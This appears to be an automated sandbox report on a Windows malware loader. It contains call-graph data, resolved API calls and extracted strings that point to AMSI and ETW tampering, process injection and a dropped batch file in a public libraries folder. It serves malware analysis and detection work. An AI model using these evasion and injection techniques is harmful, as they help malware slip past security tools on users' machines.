60914->60915 60916 15ca9e24 60914->60916 60954 15cada34 60915->60954 60918 15cada34 34 API calls 60916->60918 60920 15ca9e2c 60918->60920 61014 15ca1f13 30 API calls 60920->61014 60923 15ca9e3a 61015 15ca1f09 11 API calls 60923->61015 60925 15ca9e42 61016 15ca915b 30 API calls 60925->61016 60928 15ca9e79 60939 15caa109 60928->60939 60929 15ca9e54 61017 15ca3014 30 API calls 60929->61017 60933 15ca9e5f 61018 15ca1f13 30 API calls 60933->61018 60935 15ca9e69 61019 15ca1f09 11 API calls 60935->61019 60937 15ca9e1f 60938 15ca1f09 11 API calls 60937->60938 60938->60928 60940 15caa127 60939->60940 61020 15cb3549 RegOpenKeyExA 60940->61020 60943 15caa15c 61025 15ca905c 30 API calls 60943->61025 60944 15caa142 60945 15caa147 60944->60945 60946 15ca9e9b 60944->60946 61023 15ca905c 30 API calls 60945->61023 60948 15caa16a 61026 15caa179 87 API calls 60948->61026 60951 15caa155 61024 15caa22d 31 API calls 60951->61024 60953 15caa15a 60953->60946 61027 15ca1f86 60954->61027 60957 15cada70 61037 15cbb5b4 31 API calls 60957->61037 60958 15cadaa5 61040 15cbbfb7 GetCurrentProcess IsWow64Process 60958->61040 60959 15cada66 60961 15cadb99 GetLongPathNameW 60959->60961 61031 15ca417e 60961->61031 60963 15cadaaa 60966 15cadaae 60963->60966 60967 15cadb00 60963->60967 60964 15cada79 61038 15ca1f13 30 API calls 60964->61038 60971 15ca417e 30 API calls 60966->60971 60970 15ca417e 30 API calls 60967->60970 60975 15cadb0e 60970->60975 60976 15cadabc 60971->60976 60972 15cada83 61039 15ca1f09 11 API calls 60972->61039 60973 15ca417e 30 API calls 60974 15cadbbd 60973->60974 61049 15caddd1 30 API calls 60974->61049 60981 15ca417e 30 API calls 60975->60981 60982 15ca417e 30 API calls 60976->60982 60979 15cadbd0 61050 15ca2fa5 30 API calls 60979->61050 60984 15cadb24 60981->60984 60985 15cadad2 60982->60985 60983 15cadbdb 61051 15ca2fa5 30 API calls 60983->61051 61045 15ca2fa5 30 API calls 60984->61045 61041 15ca2fa5 30 API calls 60985->61041 60989 15cadbe5 61052 15ca1f09 11 API calls 
60989->61052 60990 15cadb2f 61046 15ca1f13 30 API calls 60990->61046 60991 15cadadd 61042 15ca1f13 30 API calls 60991->61042 60995 15cadbef 61053 15ca1f09 11 API calls 60995->61053 60996 15cadb3a 61047 15ca1f09 11 API calls 60996->61047 60997 15cadae8 61043 15ca1f09 11 API calls 60997->61043 61001 15cadbf8 61054 15ca1f09 11 API calls 61001->61054 61002 15cadb43 61048 15ca1f09 11 API calls 61002->61048 61003 15cadaf1 61044 15ca1f09 11 API calls 61003->61044 61007 15cadc01 61055 15ca1f09 11 API calls 61007->61055 61008 15cadafa 61008->60972 61010 15cadc0a 61056 15ca1f09 11 API calls 61010->61056 61012 15ca9e15 61013 15ca1f13 30 API calls 61012->61013 61013->60937 61014->60923 61015->60925 61016->60929 61017->60933 61018->60935 61019->60937 61021 15cb3573 RegQueryValueExA RegCloseKey 61020->61021 61022 15caa12e 61020->61022 61021->61022 61022->60943 61022->60944 61023->60951 61024->60953 61025->60948 61026->60946 61028 15ca1f8e 61027->61028 61057 15ca2252 61028->61057 61030 15ca1f99 61030->60957 61030->60958 61030->60959 61032 15ca4186 61031->61032 61033 15ca2252 11 API calls 61032->61033 61034 15ca4191 61033->61034 61062 15ca41bc 30 API calls 61034->61062 61036 15ca419c 61036->60973 61037->60964 61038->60972 61039->60959 61040->60963 61041->60991 61042->60997 61043->61003 61044->61008 61045->60990 61046->60996 61047->61002 61048->61008 61049->60979 61050->60983 61051->60989 61052->60995 61053->61001 61054->61007 61055->61010 61056->61012 61058 15ca22ac 61057->61058 61059 15ca225c 61057->61059 61058->61030 61059->61058 61061 15ca2779 11 API calls std::_Deallocate 61059->61061 61061->61058 61062->61036 61063 3231c6c 61064 3231d04 61063->61064 61065 3231c7c 61063->61065 61066 3231f58 61064->61066 61067 3231d0d 61064->61067 61068 3231cc0 61065->61068 61069 3231c89 61065->61069 61073 3231fec 61066->61073 61074 3231f68 61066->61074 61084 3231fac 61066->61084 61070 3231e24 61067->61070 61080 3231d25 61067->61080 61071 3231724 10 API calls 61068->61071 61072 3231c94 
61069->61072 61111 3231724 61069->61111 61090 3231e55 Sleep 61070->61090 61091 3231e7c 61070->61091 61097 3231e95 61070->61097 61081 3231cd7 61071->61081 61077 3231724 10 API calls 61074->61077 61075 3231d2c 61096 3231f82 61077->61096 61078 3231724 10 API calls 61099 3231f2c 61078->61099 61079 3231d48 61092 3231d79 Sleep 61079->61092 61103 3231d9c 61079->61103 61080->61075 61080->61079 61087 3231dfc 61080->61087 61082 3231cfd 61081->61082 61101 3231a8c 8 API calls 61081->61101 61083 3231fb2 61084->61083 61088 3231724 10 API calls 61084->61088 61085 3231ca1 61086 3231cb9 61085->61086 61135 3231a8c 61085->61135 61093 3231724 10 API calls 61087->61093 61102 3231fc1 61088->61102 61089 3231fa7 61090->61091 61094 3231e6f Sleep 61090->61094 61091->61078 61091->61097 61095 3231d91 Sleep 61092->61095 61092->61103 61106 3231e05 61093->61106 61094->61070 61095->61079 61096->61089 61104 3231a8c 8 API calls 61096->61104 61099->61097 61105 3231a8c 8 API calls 61099->61105 61100 3231e1d 61101->61082 61102->61089 61107 3231a8c 8 API calls 61102->61107 61104->61089 61108 3231f50 61105->61108 61106->61100 61109 3231a8c 8 API calls 61106->61109 61110 3231fe4 61107->61110 61109->61100 61112 3231968 61111->61112 61113 323173c 61111->61113 61114 3231938 61112->61114 61115 3231a80 61112->61115 61123 32317cb Sleep 61113->61123 61125 323174e 61113->61125 61119 3231947 Sleep 61114->61119 61128 3231986 61114->61128 61117 3231684 VirtualAlloc 61115->61117 61118 3231a89 61115->61118 61116 323175d 61116->61085 61120 32316bf 61117->61120 61121 32316af 61117->61121 61118->61085 61122 323195d Sleep 61119->61122 61119->61128 61120->61085 61152 3231644 61121->61152 61122->61114 61123->61125 61127 32317e4 Sleep 61123->61127 61125->61116 61126 323182c 61125->61126 61129 323180a Sleep 61125->61129 61133 32315cc VirtualAlloc 61126->61133 61134 3231838 61126->61134 61127->61113 61130 32315cc VirtualAlloc 61128->61130 61132 32319a4 61128->61132 61129->61126 61131 3231820 Sleep 61129->61131 61130->61132 
61131->61125 61132->61085 61133->61134 61134->61085 61136 3231aa1 61135->61136 61137 3231b6c 61135->61137 61139 3231aa7 61136->61139 61142 3231b13 Sleep 61136->61142 61138 32316e8 61137->61138 61137->61139 61141 3231c66 61138->61141 61143 3231644 2 API calls 61138->61143 61140 3231ab0 61139->61140 61145 3231b4b Sleep 61139->61145 61148 3231b81 61139->61148 61140->61086 61141->61086 61142->61139 61144 3231b2d Sleep 61142->61144 61146 32316f5 VirtualFree 61143->61146 61144->61136 61147 3231b61 Sleep 61145->61147 61145->61148 61149 323170d 61146->61149 61147->61139 61150 3231c00 VirtualFree 61148->61150 61151 3231ba4 61148->61151 61149->61086 61150->61086 61151->61086 61153 3231681 61152->61153 61154 323164d 61152->61154 61153->61120 61154->61153 61155 323164f Sleep 61154->61155 61156 3231664 61155->61156 61156->61153 61157 3231668 Sleep 61156->61157 61157->61154
APIs
• InetIsOffline.URL(00000000,00000000,03258FB6,?,?,?,00000000,00000000), ref: 0324D604
  • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
  • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
  • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
  • Part of subcall function 03237E18: GetFileAttributesA.KERNEL32(00000000,?,0324E0EE,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanString,03295344,03258FEC,UacScan,03295344,03258FEC,UacInitialize), ref: 03237E23
  • Part of subcall function 0323C320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,032955F0,?,0324E40F,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanBuffer,03295344,03258FEC,OpenSession), ref: 0323C337
  • Part of subcall function 0324C4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C5AC), ref: 0324C517
  • Part of subcall function 0324C4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0324C5AC), ref: 0324C547
  • Part of subcall function 0324C4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0324C55C
  • Part of subcall function 0324C4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0324C588
  • Part of subcall function 0324C4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0324C591
  • Part of subcall function 03237E3C: GetFileAttributesA.KERNEL32(00000000,?,03251133,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanBuffer,03295344,03258FEC,ScanString), ref: 03237E47
  • Part of subcall function 03238004: CreateDirectoryA.KERNEL32(00000000,00000000,?,03251324,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,Initialize,03295344,03258FEC,ScanString,03295344,03258FEC), ref: 03238011
Strings
Memory Dump Source
• Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
• Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
Yara matches
Similarity
• API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
• String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 2725267379-582383607
• Opcode ID: d516c37dbde887af56da4a7eccc8c9c528be5c388ed177d6c32cb5c16f5c1b7e
• Instruction ID: daa2a4e0cfcd708ac872c91d7a1f7576a9c3d929c86dbbfb92bb2a844e03f07a
• Opcode Fuzzy Hash: d516c37dbde887af56da4a7eccc8c9c528be5c388ed177d6c32cb5c16f5c1b7e
• Instruction Fuzzy Hash: 0604EB79A64359CFCB14FB65DC80ADD73B5AB8A314F5081E2A408EB654DBB0AEC1CF50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324c74c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234da4 * 2 call 3234728 call 324c3f8 4736->4980 4979->4728 4980->4979 5164->5165 5165->4638
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 03232EE0: QueryPerformanceCounter.KERNEL32 ref: 03232EE4
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,17D78400,00001000,00000040,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,UacScan,03295344,03258FEC,ScanBuffer,03295344,03258FEC), ref: 0325681D
                                                                                                                                                                                      • Part of subcall function 03247968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                      • Part of subcall function 03247968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                      • Part of subcall function 03247968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(15CA0000,00000000,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,UacScan,03295344,03258FEC,ScanBuffer,03295344,03258FEC,OpenSession,03295344), ref: 03256B4F
                                                                                                                                                                                      • Part of subcall function 03237E18: GetFileAttributesA.KERNEL32(00000000,?,0324E0EE,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanString,03295344,03258FEC,UacScan,03295344,03258FEC,UacInitialize), ref: 03237E23
                                                                                                                                                                                      • Part of subcall function 0324C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C4CA), ref: 0324C437
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0324C471
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0324C49E
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0324C4A7
                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC,Initialize,03295344,03258FEC,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC), ref: 03258B96
                                                                                                                                                                                      • Part of subcall function 03234C24: SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                      • Part of subcall function 03234C3C: SysFreeString.OLEAUT32 ref: 03234C4F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AddressFreeHandleModulePathProcProcessString$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                                                                                    • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,03230000,0325B790), ref: 03235AAC
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 03235ACA
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03235AE8
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235B06
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 03235B4F
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 03235B6D
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 03235B8F
                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03235BAC
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03235BB9
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03235BBF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 03235BEA
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235C31
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03235C41
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03235C69
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03235C79
                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03235C9F
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 03235CAF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32 ref: 0324CDD3
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002CC,000000FF,ScanString,03295344,0324D0A4,OpenSession,03295344,0324D0A4,ScanString,03295344,0324D0A4,OpenSession,03295344,0324D0A4,UacScan,03295344), ref: 0324D01F
                                                                                                                                                                                    • CloseHandle.KERNEL32(000002CC), ref: 0324D02A
                                                                                                                                                                                    • CloseHandle.KERNEL32(000002D0), ref: 0324D035
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                     • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                                                                                                                    • String ID: *"C:\Users\Public\Libraries\RdxcjsngO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                                                                    • API String ID: 1205125484-624790493
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 0324796B
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03247970
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                     • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                    • API String ID: 421316089-2206134580
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 03247975
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0324797B
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0324799B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 0324796B
                                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 03247970
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                     • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                                                    • API String ID: 421316089-2206134580
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03234EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03234EF2
                                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C5AC), ref: 0324C517
                                                                                                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0324C5AC), ref: 0324C547
                                                                                                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0324C55C
                                                                                                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0324C588
                                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0324C591
                                                                                                                                                                                      • Part of subcall function 03234C24: SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                     • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1897104825-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0324C9EA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
